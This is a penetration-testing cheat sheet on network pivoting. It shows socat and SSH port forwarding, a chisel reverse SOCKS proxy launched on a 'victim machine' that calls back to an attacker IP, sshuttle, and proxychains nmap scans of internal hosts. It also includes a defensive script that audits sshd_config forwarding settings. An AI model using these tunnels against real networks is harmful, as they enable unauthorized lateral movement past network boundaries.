Pivoting
Port Forwarding
The goal is to redirect packets arriving on one port to another port (or another host).
# from IPv4 to IPv6: every connection to localhost:445 is forwarded to <ipv6>:445
# (no space after the comma in the option list; an IPv6 literal must be bracketed)
sudo socat TCP-LISTEN:445,fork TCP6:[<ipv6>]:445
ssh to kali machine

note:
<local-port> and <local-machine> refer to the Kali machine (attacker); <service-port> is the service on the host you run this from.
# -R must be followed directly by the forwarding spec; -N (no remote command) goes before it
ssh -N -R <local-port>:127.0.0.1:<service-port> root@<local-machine>
Reverse Proxy
chisel
ref: https://www.youtube.com/watch?v=dIqoULXmhXg
Attacker (Kali)
./chisel server -p 8000 --reverse

Run in Victim Machine
Windows
chisel.exe client <attacker ip>:8000 R:socks

Linux
./chisel client <attacker ip>:8000 R:socks
Configure proxychains (Attacker)
edit /etc/proxychains4.conf (chisel's reverse SOCKS listener defaults to port 1080):
[ProxyList]
socks5 127.0.0.1 1080
Run command
proxychains nmap -sT -p 88 -Pn -n <machine 2 ip>
sshuttle
Requires an SSH login as a user on the remote host (and Python on that host)
# single
sshuttle -r username@remotehost 0.0.0.0/0
# example
sshuttle user@192.168.20.35 192.168.30.0/24
sshuttle -r root@10.1.1.1 10.2.2.0/24
SSH Tunnel
nice ref: https://www.isabekov.pro/reverse-ssh-tunnel/
Can't ssh to the machine? Run this from that machine so the tunnel is opened from it back to the attacker host:
# the 127.0.0.1 destination and <user>@<attacker ip> complete the command; the original line was cut short
ssh -p 22 -R <attacker port>:127.0.0.1:<host port> <user>@<attacker ip>

Forward Proxy
chisel
sshuttle
SSH Tunnel (recommended if you want to reach an internal port)
Forward Proxy
Need SSH to machine:
ssh -D <local port> <user>@<IP of victim you have>
# example
ssh -D 8989 local@10.10.10.10
This means every connection sent to 127.0.0.1:8989 is forwarded through 10.10.10.10 and leaves from its address (SOCKS proxy on the local port).
You can set the proxy in your browser (manual proxy configuration: SOCKS host 127.0.0.1, port 8989)
or in proxychains.conf:
[ProxyList]
socks4 127.0.0.1 8989
Use an incognito window or clear the browser cache, so responses cached before the proxy was set don't mislead you.

If the internal service uses virtual hosts, add the vhost name to /etc/hosts on Kali (matching the entry in /etc/hosts on the victim machine) so the browser sends the expected Host header through the proxy.
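From the defender's side, the `ssh -R` reverse forward and the `ssh -D` SOCKS proxy above both depend on sshd's forwarding settings. The following is an added example (not from the original page) that parses an sshd_config and reports which of those tunnel types a logged-in user could still build; the two sample configs are constructed, and the defaults are those documented in sshd_config(5).

```python
import re

# sshd defaults (OpenSSH sshd_config(5)) for the keywords that govern the tunnels on
# this page: ssh -D needs local (direct-tcpip) forwarding, ssh -R needs remote forwarding.
DEFAULTS = {"allowtcpforwarding": "yes", "gatewayports": "no",
            "permitopen": "any", "permitlisten": "any"}

def parse_sshd_config(text):
    """Effective global options: first occurrence wins (as in sshd); lines inside
    Match blocks are skipped because they apply conditionally."""
    opts, seen, in_match = dict(DEFAULTS), set(), False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()              # strip comments/blank lines
        m = re.match(r"([A-Za-z]+)\s*=?\s*(.*)$", line)  # "Key value" or "Key=value"
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            in_match = True                              # rest of file is conditional
        elif not in_match and key not in seen:
            seen.add(key)
            opts[key] = value
    return opts

def audit_forwarding(text):
    """Report which of the page's SSH tunnel types this sshd_config still permits."""
    o = parse_sshd_config(text)
    tcp = o["allowtcpforwarding"].lower()
    return {
        "ssh -D socks proxy": tcp in ("yes", "all", "local"),
        "ssh -R reverse forward": tcp in ("yes", "all", "remote"),
        "-R can bind non-loopback": o["gatewayports"].lower() in ("yes", "clientspecified"),
        "-D may reach any destination": o["permitopen"].lower() == "any",
        "-R may bind any port": o["permitlisten"].lower() == "any",
    }

# Constructed sample: stock config, forwarding line commented out so the default applies
SAMPLE_DEFAULT = """
# AllowTcpForwarding yes
"""

# Constructed sample: forwarding off globally; only a jump group gets -L/-D to one host
SAMPLE_HARDENED = """
AllowTcpForwarding no
GatewayPorts no
Match Group jumphosts
    AllowTcpForwarding local
    PermitOpen 10.0.5.20:443
"""
```

Note that sshuttle does not use TCP forwarding at all: it runs a Python helper over the SSH exec channel, so only restricting command execution (ForceCommand, or the `restrict` option in authorized_keys) stops it.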
Case of forward proxy
Are you stuck?
Network Pentest with Chisel: https://notes.benheater.com/books/network-pivoting/page/penetrating-networks-via-chisel-proxies